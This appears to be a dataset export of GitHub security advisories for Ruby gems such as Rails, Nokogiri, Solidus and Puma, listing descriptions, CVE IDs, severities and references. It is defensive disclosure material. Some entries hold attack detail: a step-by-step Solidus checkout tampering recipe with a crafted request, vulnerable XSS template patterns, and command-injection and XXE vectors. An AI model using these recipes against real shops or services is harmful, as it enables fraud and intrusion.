ecosystem
stringclasses
14 values
vuln_id
stringlengths
10
19
summary
stringlengths
4
267
details
stringlengths
9
13.5k
aliases
stringlengths
17
144
modified_date
stringdate
2010-05-27 05:47:00
2022-05-10 08:46:52
published_date
stringdate
2005-12-31 05:00:00
2022-05-10 08:46:50
severity
stringclasses
5 values
score
float64
0
10
cwe_id
stringclasses
988 values
refs
stringlengths
30
17.7k
introduced
stringlengths
75
4.26k
RubyGems
GHSA-65cv-r6x7-79hv
Possible XSS vulnerability in ActionView
There is a possible XSS vulnerability in ActionView's JavaScript literal escape helpers. Views that use the `j` or `escape_javascript` methods may be susceptible to XSS attacks. ### Impact There is a possible XSS vulnerability in the `j` and `escape_javascript` methods in ActionView. These methods are used for escaping JavaScript string literals. Impacted code will look something like this: ```erb <script>let a = `<%= j unknown_input %>`</script> ``` or ```erb <script>let a = `<%= escape_javascript unknown_input %>`</script> ``` ### Releases The 6.0.2.2 and 5.2.4.2 releases are available at the normal locations. ### Workarounds For those that can't upgrade, the following monkey patch may be used: ```ruby ActionView::Helpers::JavaScriptHelper::JS_ESCAPE_MAP.merge!( { "`" => "\\`", "$" => "\\$" } ) module ActionView::Helpers::JavaScriptHelper alias :old_ej :escape_javascript alias :old_j :j def escape_javascript(javascript) javascript = javascript.to_s if javascript.empty? result = "" else result = javascript.gsub(/(\\|<\/|\r\n|\342\200\250|\342\200\251|[\n\r"']|[`]|[$])/u, JS_ESCAPE_MAP) end javascript.html_safe? ? result.html_safe : result end alias :j :escape_javascript end ``` ### Patches To aid users who aren't able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset. * [5-2-js-helper-xss.patch](https://gist.github.com/tenderlove/c042ff49f0347c37e99183a6502accc6#file-5-2-js-helper-xss-patch) - Patch for 5.2 series * [6-0-js-helper-xss.patch](https://gist.github.com/tenderlove/c042ff49f0347c37e99183a6502accc6#file-6-0-js-helper-xss-patch) - Patch for 6.0 series Please note that only the 5.2 and 6.0 series are supported at present. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases. ### Credits Thanks to Jesse Campos from Chef Secure
{'CVE-2020-5267'}
2022-03-03T05:13:34.293247Z
2020-03-19T17:30:29Z
MODERATE
null
{'CWE-80'}
{'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB/', 'https://github.com/rails/rails/security/advisories/GHSA-65cv-r6x7-79hv', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5267', 'http://www.openwall.com/lists/oss-security/2020/03/19/1', 'https://lists.debian.org/debian-lts-announce/2020/03/msg00022.html', 'http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00019.html', 'https://github.com/rails/rails/commit/033a738817abd6e446e1b320cb7d1a5c15224e9a', 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2020-5267.yml', 'https://groups.google.com/forum/#!topic/rubyonrails-security/55reWMM_Pg8'}
null
RubyGems
GHSA-v2r9-c84j-v7xm
Moderate severity vulnerability that affects rdoc
darkfish.js in RDoc 2.3.0 through 3.12 and 4.x before 4.0.0.preview2.1, as used in Ruby, does not properly generate documents, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted URL.
{'CVE-2013-0256'}
2022-03-03T05:11:50.274049Z
2017-10-24T18:33:37Z
MODERATE
null
{'CWE-79'}
{'http://secunia.com/advisories/52774', 'https://nvd.nist.gov/vuln/detail/CVE-2013-0256', 'http://lists.opensuse.org/opensuse-updates/2013-02/msg00048.html', 'http://www.ubuntu.com/usn/USN-1733-1', 'https://bugzilla.redhat.com/show_bug.cgi?id=907820', 'https://github.com/advisories/GHSA-v2r9-c84j-v7xm', 'http://blog.segment7.net/2013/02/06/rdoc-xss-vulnerability-cve-2013-0256-releases-3-9-5-3-12-1-4-0-0-rc-2', 'https://github.com/rdoc/rdoc', 'http://rhn.redhat.com/errata/RHSA-2013-0701.html', 'http://rhn.redhat.com/errata/RHSA-2013-0548.html', 'http://rhn.redhat.com/errata/RHSA-2013-0728.html', 'http://www.ruby-lang.org/en/news/2013/02/06/rdoc-xss-cve-2013-0256/', 'http://rhn.redhat.com/errata/RHSA-2013-0686.html', 'https://github.com/rdoc/rdoc/commit/ffa87887ee0517793df7541629a470e331f9fe60', 'http://lists.opensuse.org/opensuse-security-announce/2013-04/msg00015.html'}
null
RubyGems
GHSA-3mvg-rrrw-m7ph
Ability to change order address without triggering address validations in solidus
### Impact This vulnerability allows a malicious customer to craft request data with parameters that allow changing the address of the current order without changing the shipment costs associated with the new shipment. All stores with at least two shipping zones and different costs of shipment per zone are impacted. E.g. 1. Store admin configured the store so that there are two zones in US: - East Cost Zone - Shipping Method cost: $1 - West Cost Zone - Shipping Method cost: $10 The attacker user can know that shipping to NY is less expensive than to LA just by testing different addresses in checkout. 2. The attacker user enters any NY shipping address in the address step 3. The attacker user chooses the $1 delivery option 4. The attacker user crafts a request with their real LA address, similar to: ``` // POST #checkout/update: { state: 'payment', order: { ship_address_attributes: { city: 'Los Angeles', ... } } } ``` 5. The attacker user proceeds with checking out with a new address and the $1 shipment costs. Another scenario where this could be dangerous is: > You cannot ship products in some zones and you are relying on Solidus Shipping Method building only to filter out unwanted zones. Malicious users can enter an allowed zone's address and change back to an unwanted one in the payment step by crafting a request with some proper ship_address_attributes. This problem comes from how checkout permitted attributes are structured. We have a single list of attributes that are permitted across the whole checkout, no matter the step that is being submitted. ### Patches A PR has been attached to fix the security concern for each of all the Solidus supported versions following the rules of the [Solidus Security Policy](https://solidus.io/security). ### Workarounds When it's not possible to upgrade to a supported patched version, please use this gist to patch the store: https://gist.github.com/kennyadsl/4618cd9797984cb64f7700a81bda889d
{'CVE-2020-15109'}
2022-03-03T05:13:01.624994Z
2020-08-04T22:17:57Z
MODERATE
null
{'CWE-20', 'CWE-862'}
{'https://github.com/solidusio/solidus/security/advisories/GHSA-3mvg-rrrw-m7ph', 'https://solidus.io/blog/2020/07/16/new-releases.html', 'https://github.com/solidusio/solidus', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15109', 'https://gist.github.com/kennyadsl/4618cd9797984cb64f7700a81bda889d'}
null
RubyGems
GHSA-92v7-pq4h-58j5
Moderate severity vulnerability that affects facter, hiera, mcollective-client, and puppet
Untrusted search path vulnerability in Puppet Enterprise 2.8 before 2.8.7, Puppet before 2.7.26 and 3.x before 3.6.2, Facter 1.6.x and 2.x before 2.0.2, Hiera before 1.3.4, and Mcollective before 2.5.2, when running with Ruby 1.9.1 or earlier, allows local users to gain privileges via a Trojan horse file in the current working directory, as demonstrated using (1) rubygems/defaults/operating_system.rb, (2) Win32API.rb, (3) Win32API.so, (4) safe_yaml.rb, (5) safe_yaml/deep.rb, or (6) safe_yaml/deep.so; or (7) operatingsystem.rb, (8) operatingsystem.so, (9) osfamily.rb, or (10) osfamily.so in puppet/confine.
{'CVE-2014-3248'}
2022-03-03T05:13:33.454544Z
2017-10-24T18:33:36Z
MODERATE
null
null
{'http://secunia.com/advisories/59197', 'http://rowediness.com/2014/06/13/cve-2014-3248-a-little-problem-with-puppet/', 'http://secunia.com/advisories/59200', 'https://nvd.nist.gov/vuln/detail/CVE-2014-3248', 'https://github.com/advisories/GHSA-92v7-pq4h-58j5', 'http://www.securityfocus.com/bid/68035', 'http://puppetlabs.com/security/cve/cve-2014-3248'}
null
RubyGems
GHSA-7rrm-v45f-jp64
Update packaged dependency libxml2 from 2.9.10 to 2.9.12
### Summary Nokogiri v1.11.4 updates the vendored libxml2 from v2.9.10 to v2.9.12 which addresses: - [CVE-2019-20388](https://security.archlinux.org/CVE-2019-20388) (Medium severity) - [CVE-2020-24977](https://security.archlinux.org/CVE-2020-24977) (Medium severity) - [CVE-2021-3517](https://security.archlinux.org/CVE-2021-3517) (Medium severity) - [CVE-2021-3518](https://security.archlinux.org/CVE-2021-3518) (Medium severity) - [CVE-2021-3537](https://security.archlinux.org/CVE-2021-3537) (Low severity) - [CVE-2021-3541](https://security.archlinux.org/CVE-2021-3541) (Low severity) Note that two additional CVEs were addressed upstream but are not relevant to this release. [CVE-2021-3516](https://security.archlinux.org/CVE-2021-3516) via `xmllint` is not present in Nokogiri, and [CVE-2020-7595](https://security.archlinux.org/CVE-2020-7595) has been patched in Nokogiri since v1.10.8 (see #1992). Please note that this advisory only applies to the CRuby implementation of Nokogiri `< 1.11.4`, and only if the packaged version of libxml2 is being used. If you've overridden defaults at installation time to use system libraries instead of packaged libraries, you should instead pay attention to your distro's `libxml2` release announcements. ### Mitigation Upgrade to Nokogiri `>= 1.11.4`. ### Impact I've done a brief analysis of the published CVEs that are addressed in this upstream release. The libxml2 maintainers have not released a canonical set of CVEs, and so this list is pieced together from secondary sources and may be incomplete. All information below is sourced from [security.archlinux.org](https://security.archlinux.org), which appears to have the most up-to-date information as of this analysis. #### [CVE-2019-20388](https://security.archlinux.org/CVE-2019-20388) - **Severity**: Medium - **Type**: Denial of service - **Description**: A memory leak was found in the xmlSchemaValidateStream function of libxml2. Applications that use this library may be vulnerable to memory not being freed leading to a denial of service. - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/commit/7ffcd44d7e6c46704f8af0321d9314cd26e0e18a Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4. #### [CVE-2020-7595](https://security.archlinux.org/CVE-2020-7595) - **Severity**: Medium - **Type**: Denial of service - **Description**: xmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation. - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/commit/0e1a49c8907645d2e155f0d89d4d9895ac5112b5 This has been patched in Nokogiri since v1.10.8 (see #1992). #### [CVE-2020-24977](https://security.archlinux.org/CVE-2020-24977) - **Severity**: Medium - **Type**: Information disclosure - **Description**: GNOME project libxml2 <= 2.9.10 has a global buffer over-read vulnerability in xmlEncodeEntitiesInternal at libxml2/entities.c. - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/commit/50f06b3efb638efb0abd95dc62dca05ae67882c2 Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4. #### [CVE-2021-3516](https://security.archlinux.org/CVE-2021-3516) - **Severity**: Medium - **Type**: Arbitrary code execution (no remote vector) - **Description**: A use-after-free security issue was found libxml2 before version 2.9.11 when "xmllint --html --push" is used to process crafted files. - **Issue**: https://gitlab.gnome.org/GNOME/libxml2/-/issues/230 - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/1358d157d0bd83be1dfe356a69213df9fac0b539 Verified that the fix commit first appears in v2.9.11. This vector does not exist within Nokogiri, which does not ship `xmllint`. #### [CVE-2021-3517](https://security.archlinux.org/CVE-2021-3517) - **Severity**: Medium - **Type**: Arbitrary code execution - **Description**: A heap-based buffer overflow was found in libxml2 before version 2.9.11 when processing truncated UTF-8 input. - **Issue**: https://gitlab.gnome.org/GNOME/libxml2/-/issues/235 - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2 Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4. #### [CVE-2021-3518](https://security.archlinux.org/CVE-2021-3518) - **Severity**: Medium - **Type**: Arbitrary code execution - **Description**: A use-after-free security issue was found in libxml2 before version 2.9.11 in xmlXIncludeDoProcess() in xinclude.c when processing crafted files. - **Issue**: https://gitlab.gnome.org/GNOME/libxml2/-/issues/237 - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/1098c30a040e72a4654968547f415be4e4c40fe7 Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4. #### [CVE-2021-3537](https://security.archlinux.org/CVE-2021-3537) - **Severity**: Low - **Type**: Denial of service - **Description**: It was found that libxml2 before version 2.9.11 did not propagate errors while parsing XML mixed content, causing a NULL dereference. If an untrusted XML document was parsed in recovery mode and post-validated, the flaw could be used to crash the application. - **Issue**: https://gitlab.gnome.org/GNOME/libxml2/-/issues/243 - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/babe75030c7f64a37826bb3342317134568bef61 Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4. #### [CVE-2021-3541](https://security.archlinux.org/CVE-2021-3541) - **Severity**: Low - **Type**: Denial of service - **Description**: A security issue was found in libxml2 before version 2.9.11. Exponential entity expansion attack its possible bypassing all existing protection mechanisms and leading to denial of service. - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/8598060bacada41a0eb09d95c97744ff4e428f8e Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4, however Nokogiri's default parse options prevent the attack from succeeding (it is necessary to opt into `DTDLOAD` which is off by default). For more details supporting this analysis of this CVE, please visit #2233.
null
2022-03-03T05:14:19.051141Z
2021-05-17T20:52:05Z
MODERATE
null
null
{'https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-7rrm-v45f-jp64'}
null
RubyGems
GHSA-x2fr-v8wf-8wwv
High severity vulnerability that affects ruby-saml
OneLogin Ruby-SAML 1.6.0 and earlier may incorrectly utilize the results of XML DOM traversal and canonicalization APIs in such a way that an attacker may be able to manipulate the SAML data without invalidating the cryptographic signature, allowing the attack to potentially bypass authentication to SAML service providers.
{'CVE-2017-11428'}
2022-03-03T05:13:12.644781Z
2019-07-05T21:11:35Z
HIGH
null
{'CWE-287'}
{'https://github.com/advisories/GHSA-x2fr-v8wf-8wwv', 'https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations', 'https://www.kb.cert.org/vuls/id/475445', 'https://nvd.nist.gov/vuln/detail/CVE-2017-11428'}
null
RubyGems
GHSA-9c2j-593q-3g82
Moderate severity vulnerability that affects activesupport
The ActiveSupport::XmlMini_JDOM backend in lib/active_support/xml_mini/jdom.rb in the Active Support component in Ruby on Rails 3.0.x and 3.1.x before 3.1.12 and 3.2.x before 3.2.13, when JRuby is used, does not properly restrict the capabilities of the XML parser, which allows remote attackers to read arbitrary files or cause a denial of service (resource consumption) via vectors involving (1) an external DTD or (2) an external entity declaration in conjunction with an entity reference.
{'CVE-2013-1856'}
2022-03-03T05:13:23.847776Z
2017-10-24T18:33:37Z
MODERATE
null
{'CWE-20'}
{'https://groups.google.com/group/rubyonrails-security/msg/6c2482d4ed1545e6?dmode=source&output=gplain', 'https://github.com/advisories/GHSA-9c2j-593q-3g82', 'http://support.apple.com/kb/HT5784', 'http://weblog.rubyonrails.org/2013/3/18/SEC-ANN-Rails-3-2-13-3-1-12-and-2-3-18-have-been-released/', 'http://lists.apple.com/archives/security-announce/2013/Oct/msg00006.html', 'https://nvd.nist.gov/vuln/detail/CVE-2013-1856', 'http://lists.apple.com/archives/security-announce/2013/Jun/msg00000.html'}
null
RubyGems
GHSA-4jm3-pfpf-h54p
espeak-ruby allows arbitrary command execution
The espeak-ruby gem before 1.0.3 for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in a string to the speak, save, bytes or bytes_wav method in lib/espeak/speech.rb.
{'CVE-2016-10193'}
2022-04-25T20:46:59.388621Z
2017-10-24T18:33:35Z
CRITICAL
null
{'CWE-284'}
{'https://github.com/advisories/GHSA-4jm3-pfpf-h54p', 'http://www.openwall.com/lists/oss-security/2017/02/02/5', 'http://www.openwall.com/lists/oss-security/2017/01/31/14', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10193', 'https://github.com/dejan/espeak-ruby', 'https://github.com/dejan/espeak-ruby/issues/7'}
null
RubyGems
GHSA-9rf5-jm6f-2fmm
High severity vulnerability that affects activerecord
activerecord/lib/active_record/relation/query_methods.rb in Active Record in Ruby on Rails 4.0.x before 4.0.9 and 4.1.x before 4.1.5 allows remote attackers to bypass the strong parameters protection mechanism via crafted input to an application that makes create_with calls.
{'CVE-2014-3514'}
2022-03-03T05:11:21.718616Z
2017-10-24T18:33:36Z
HIGH
null
null
{'http://openwall.com/lists/oss-security/2014/08/18/10', 'https://groups.google.com/forum/message/raw?msg=rubyonrails-security/M4chq5Sb540/CC1Fh0Y_NWwJ', 'http://secunia.com/advisories/60347', 'https://github.com/advisories/GHSA-9rf5-jm6f-2fmm', 'https://nvd.nist.gov/vuln/detail/CVE-2014-3514', 'http://rhn.redhat.com/errata/RHSA-2014-1102.html'}
null
RubyGems
GHSA-6qvp-r6r3-9p7h
Moderate severity vulnerability that affects nokogiri
A NULL pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2 through 2.9.8 when parsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR case. Applications processing untrusted XSL format inputs with the use of the libxml2 library may be vulnerable to a denial of service attack due to a crash of the application.
{'CVE-2018-14404'}
2022-03-03T05:13:34.158448Z
2019-01-17T14:05:03Z
HIGH
null
{'CWE-476'}
{'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=901817', 'https://usn.ubuntu.com/3739-2/', 'https://lists.debian.org/debian-lts-announce/2018/09/msg00035.html', 'https://access.redhat.com/errata/RHSA-2019:1543', 'https://nvd.nist.gov/vuln/detail/CVE-2018-14404', 'https://security.netapp.com/advisory/ntap-20190719-0002/', 'https://gitlab.gnome.org/GNOME/libxml2/issues/10', 'https://bugzilla.redhat.com/show_bug.cgi?id=1595985', 'https://usn.ubuntu.com/3739-1/', 'https://lists.debian.org/debian-lts-announce/2020/09/msg00009.html', 'https://github.com/advisories/GHSA-6qvp-r6r3-9p7h'}
null
RubyGems
GHSA-wwmf-6p58-6vj2
High severity vulnerability that affects rwiki
The editing form in RWiki 2.1.0pre1 through 2.1.0 allows remote attackers to execute arbitrary Ruby code via unknown attack vectors.
{'CVE-2006-2582'}
2020-06-16T22:01:28Z
2017-10-24T18:33:38Z
HIGH
null
null
{'http://secunia.com/advisories/20264', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/26668', 'https://nvd.nist.gov/vuln/detail/CVE-2006-2582', 'http://www.vupen.com/english/advisories/2006/1949', 'https://github.com/advisories/GHSA-wwmf-6p58-6vj2'}
null
RubyGems
GHSA-ffpv-c4hm-3x6v
actionpack is vulnerable to denial of service via a crafted HTTP Accept header
actionpack/lib/action_dispatch/http/mime_type.rb in Action Pack in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not properly restrict use of the MIME type cache, which allows remote attackers to cause a denial of service (memory consumption) via a crafted HTTP Accept header.
{'CVE-2016-0751'}
2022-04-25T21:01:50.448153Z
2017-10-24T18:33:35Z
HIGH
null
null
{'http://www.securityfocus.com/bid/81800', 'https://groups.google.com/forum/message/raw?msg=ruby-security-ann/9oLY_FCzvoc/5CDXbvpYEgAJ', 'http://rhn.redhat.com/errata/RHSA-2016-0296.html', 'https://github.com/advisories/GHSA-ffpv-c4hm-3x6v', 'http://lists.opensuse.org/opensuse-updates/2016-02/msg00043.html', 'http://www.openwall.com/lists/oss-security/2016/01/25/9', 'http://lists.fedoraproject.org/pipermail/package-announce/2016-February/178067.html', 'https://nvd.nist.gov/vuln/detail/CVE-2016-0751', 'http://lists.fedoraproject.org/pipermail/package-announce/2016-February/178043.html', 'http://www.debian.org/security/2016/dsa-3464', 'http://www.securitytracker.com/id/1034816', 'http://lists.opensuse.org/opensuse-updates/2016-02/msg00034.html', 'http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00053.html'}
null
RubyGems
GHSA-c5r5-7pfh-6qg6
OS command injection in BibTeX-Ruby
BibTeX-ruby before 5.1.0 allows shell command injection due to unsanitized user input being passed directly to the built-in Ruby Kernel.open method through BibTeX.open.
{'CVE-2019-10780'}
2022-03-03T05:13:15.649341Z
2020-02-14T23:10:01Z
CRITICAL
null
{'CWE-78'}
{'https://snyk.io/vuln/SNYK-RUBY-BIBTEXRUBY-542602', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10780', 'https://github.com/inukshuk/bibtex-ruby/commit/14406f4460f4e1ecabd25ca94f809b3ea7c5fb11'}
null
RubyGems
GHSA-h835-75hw-pj89
Moderate severity vulnerability that affects activesupport
Cross-site scripting (XSS) vulnerability in activesupport/lib/active_support/core_ext/string/output_safety.rb in Ruby on Rails before 3.0.17, 3.1.x before 3.1.8, and 3.2.x before 3.2.8 might allow remote attackers to inject arbitrary web script or HTML via vectors involving a ' (quote) character.
{'CVE-2012-3464'}
2022-03-03T05:13:11.289823Z
2017-10-24T18:33:37Z
MODERATE
null
{'CWE-79'}
{'http://secunia.com/advisories/50694', 'https://nvd.nist.gov/vuln/detail/CVE-2012-3464', 'http://weblog.rubyonrails.org/2012/8/9/ann-rails-3-2-8-has-been-released/', 'http://rhn.redhat.com/errata/RHSA-2013-0154.html', 'https://github.com/rails/rails', 'https://groups.google.com/group/rubyonrails-security/msg/8f1bbe1cef8c6caf?dmode=source&output=gplain', 'https://github.com/advisories/GHSA-h835-75hw-pj89'}
null
RubyGems
GHSA-7xx3-m584-x994
A poorly-behaved client could use keepalive requests to monopolize Puma's reactor and create a denial of service attack
## Keepalive thread overload/DoS ### Impact A poorly-behaved client could use keepalive requests to monopolize Puma's reactor and create a denial of service attack. If more keepalive connections to Puma are opened than there are threads available, additional connections will wait permanently if the attacker sends requests frequently enough. ### Patches This vulnerability is patched in Puma 4.3.1 and 3.12.2. ### Workarounds Reverse proxies in front of Puma could be configured to always allow less than X keepalive connections to a Puma cluster or process, where X is the number of threads configured in Puma's thread pool. ### For more information If you have any questions or comments about this advisory: * Open an issue at [puma](github.com/puma/puma).
{'CVE-2019-16770'}
2022-03-03T05:12:47.984370Z
2019-12-05T19:26:37Z
MODERATE
null
{'CWE-770'}
{'https://github.com/puma/puma/security/advisories/GHSA-7xx3-m584-x994', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16770', 'https://github.com/advisories/GHSA-7xx3-m584-x994'}
null
RubyGems
GHSA-qg54-694p-wgpp
Regular expression denial of service vulnerability (ReDoS) in date
Date’s parsing methods including Date.parse are using Regexps internally, some of which are vulnerable against regular expression denial of service. Applications and libraries that apply such methods to untrusted input may be affected. The fix limits the input length up to 128 bytes by default instead of changing the regexps. This is because Date gem uses many Regexps and it is possible that there are still undiscovered vulnerable Regexps. For compatibility, it is allowed to remove the limitation by explicitly passing limit keywords as nil like Date.parse(str, limit: nil), but note that it may take a long time to parse. Please update the date gem to version 3.2.1, 3.1.2, 3.0.2, and 2.0.1, or later. You can use gem update date to update it. If you are using bundler, please add gem "date", ">= 3.2.1" to your Gemfile. If you import `date` from the standard library rather than as a gem you should update your Ruby install to `3.0.3`, `2.7.5`, `2.6.9` or later. Users unable to upgrade may consider using `Date.strptime` instead with a predefined date format ```ruby Date.strptime('2001-02-20', '%Y-%m-%d') ```
{'CVE-2021-41817'}
2022-03-17T23:15:06.275918Z
2021-11-16T00:32:30Z
MODERATE
null
{'CWE-1333'}
{'https://www.ruby-lang.org/en/news/2021/11/15/date-parsing-method-regexp-dos-cve-2021-41817/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41817', 'https://github.com/ruby/date/commit/3959accef8da5c128f8a8e2fd54e932a4fb253b0', 'https://hackerone.com/reports/1254844'}
null
RubyGems
GHSA-xxr8-833v-c7wc
Moderate severity vulnerability that affects rails
Cross-site scripting (XSS) vulnerability in the i18n translations helper method in Ruby on Rails 3.0.x before 3.0.11 and 3.1.x before 3.1.2, and the rails_xss plugin in Ruby on Rails 2.3.x, allows remote attackers to inject arbitrary web script or HTML via vectors related to a translations string whose name ends with an "html" substring.
{'CVE-2011-4319'}
2022-03-03T05:13:57.411308Z
2017-10-24T18:33:38Z
MODERATE
null
{'CWE-79'}
{'http://www.securityfocus.com/bid/50722', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/71364', 'http://groups.google.com/group/rubyonrails-security/msg/c65c24fbc4b6dd82?dmode=source&output=gplain', 'https://github.com/advisories/GHSA-xxr8-833v-c7wc', 'http://openwall.com/lists/oss-security/2011/11/18/8', 'http://osvdb.org/77199', 'http://weblog.rubyonrails.org/2011/11/18/rails-3-1-2-has-been-released', 'http://groups.google.com/group/rubyonrails-security/browse_thread/thread/2b61d70fb73c7cc5?pli=1', 'http://weblog.rubyonrails.org/2011/11/18/rails-3-0-11-has-been-released', 'https://github.com/rails/rails', 'http://www.securitytracker.com/id?1026342', 'https://nvd.nist.gov/vuln/detail/CVE-2011-4319'}
null
RubyGems
GHSA-m3q7-rj8g-m457
Moderate severity vulnerability that affects ember-source
Cross-site scripting (XSS) vulnerability in Ember.js 1.8.x through 1.10.x, 1.11.x before 1.11.4, 1.12.x before 1.12.2, 1.13.x before 1.13.12, 2.0.x before 2.0.3, 2.1.x before 2.1.2, and 2.2.x before 2.2.1 allows remote attackers to inject arbitrary web script or HTML.
{'CVE-2015-7565'}
2022-03-07T20:47:36.542936Z
2018-08-28T22:33:24Z
MODERATE
null
{'CWE-79'}
{'https://github.com/advisories/GHSA-m3q7-rj8g-m457', 'https://groups.google.com/forum/#!topic/ember-security/OfyQkoSuppY', 'https://nvd.nist.gov/vuln/detail/CVE-2015-7565', 'http://emberjs.com/blog/2016/01/14/security-releases-ember-1-11-4-1-12-2-1-13-12-2-0-3-2-1-2-2-2-1.html'}
null
RubyGems
GHSA-mx9f-w8qq-q5jf
Low severity vulnerability that affects rest-client
REST client for Ruby (aka rest-client) before 1.7.3 logs usernames and passwords, which allows local users to obtain sensitive information by reading the log.
{'CVE-2015-3448'}
2022-03-03T05:12:45.899636Z
2017-10-24T18:33:36Z
LOW
null
{'CWE-200'}
{'http://www.securityfocus.com/bid/74415', 'https://github.com/advisories/GHSA-mx9f-w8qq-q5jf', 'http://lists.opensuse.org/opensuse-updates/2015-04/msg00026.html', 'https://nvd.nist.gov/vuln/detail/CVE-2015-3448', 'https://github.com/rest-client/rest-client/issues/349', 'https://github.com/rest-client/rest-client', 'http://www.osvdb.org/117461'}
null
RubyGems
GHSA-xm34-v85h-9pg2
Authentication Bypass by CSRF Weakness
### Impact CSRF vulnerability that allows user account takeover. All applications using any version of the frontend component of `solidus_auth_devise` are affected if `protect_from_forgery` method is both: - Executed whether as: - A `before_action` callback (the default) - A `prepend_before_action` (option `prepend: true` given) before the `:load_object` hook in `Spree::UserController` (most likely order to find). - Configured to use `:null_session` or `:reset_session` strategies (`:null_session` is the default in case the no strategy is given, but `rails --new` generated skeleton use `:exception`). That means that applications that haven't been configured differently from what it's generated with Rails aren't affected. ### Patches Users should promptly update to `solidus_auth_devise` version `2.5.4`. ### Workarounds A couple of options: - If possible, change your strategy to `:exception`: ```ruby class ApplicationController < ActionController::Base protect_from_forgery with: :exception end ``` - Add the following to `config/application.rb` to at least run the `:exception` strategy on the affected controller: ```ruby config.after_initialize do Spree::UsersController.protect_from_forgery with: :exception end ``` - We've also released new Solidus versions monkey patching `solidus_auth_devise` with the quick fix. Those versions are `v3.1.3`, `v.3.0.3` & `v2.11.12`. See [GHSA-5629-8855-gf4g](https://github.com/solidusio/solidus/security/advisories/GHSA-5629-8855-gf4g) for details. ### References - [CSRF on the Rails guides](https://guides.rubyonrails.org/security.html#cross-site-request-forgery-csrf) - [Solidus security](https://solidus.io/security/) ### Thanks We'd like to thank [vampire000](https://hackerone.com/vampire000) for reporting this issue. ### For more information If you have any questions or comments about this advisory: * Open an issue in [solidus_auth_devise](https://github.com/solidusio/solidus_auth_devise/issues) or a discussion in [solidus](https://github.com/solidusio/solidus/discussions) * Email us at [security@solidus.io](mailto:security@soliidus.io) * Contact the core team on [Slack](http://slack.solidus.io/)
{'CVE-2021-41274'}
2022-03-03T05:13:04.888419Z
2021-11-18T20:09:32Z
CRITICAL
null
{'CWE-352'}
{'https://github.com/solidusio/solidus_auth_devise', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41274', 'https://github.com/solidusio/solidus_auth_devise/releases/tag/v2.5.4', 'https://github.com/solidusio/solidus_auth_devise/commit/731a6645e90ea9fd228f78ec53c6976c048a0555', 'https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2'}
null
RubyGems
GHSA-4c4w-3q45-hp9j
Aescrypt does not sufficiently use random values
The aescrypt gem 1.0.0 for Ruby does not randomize the CBC IV for use with the AESCrypt.encrypt and AESCrypt.decrypt functions, which allows attackers to defeat cryptographic protection mechanisms via a chosen plaintext attack.
{'CVE-2013-7463'}
2022-04-25T21:01:50.142532Z
2017-10-24T18:33:36Z
HIGH
null
{'CWE-330'}
{'https://github.com/Gurpartap/aescrypt/', 'https://nvd.nist.gov/vuln/detail/CVE-2013-7463', 'https://github.com/Gurpartap/aescrypt/issues/4', 'https://github.com/advisories/GHSA-4c4w-3q45-hp9j', 'http://www.securityfocus.com/bid/98035'}
null
RubyGems
GHSA-6c8p-qphv-668v
Moderate severity vulnerability that affects ruby-openid
The ruby-openid gem before 2.2.2 for Ruby allows remote OpenID providers to cause a denial of service (CPU consumption) via (1) a large XRDS document or (2) an XML Entity Expansion (XEE) attack.
{'CVE-2013-1812'}
2022-03-03T05:13:34.437438Z
2017-10-24T18:33:37Z
MODERATE
null
null
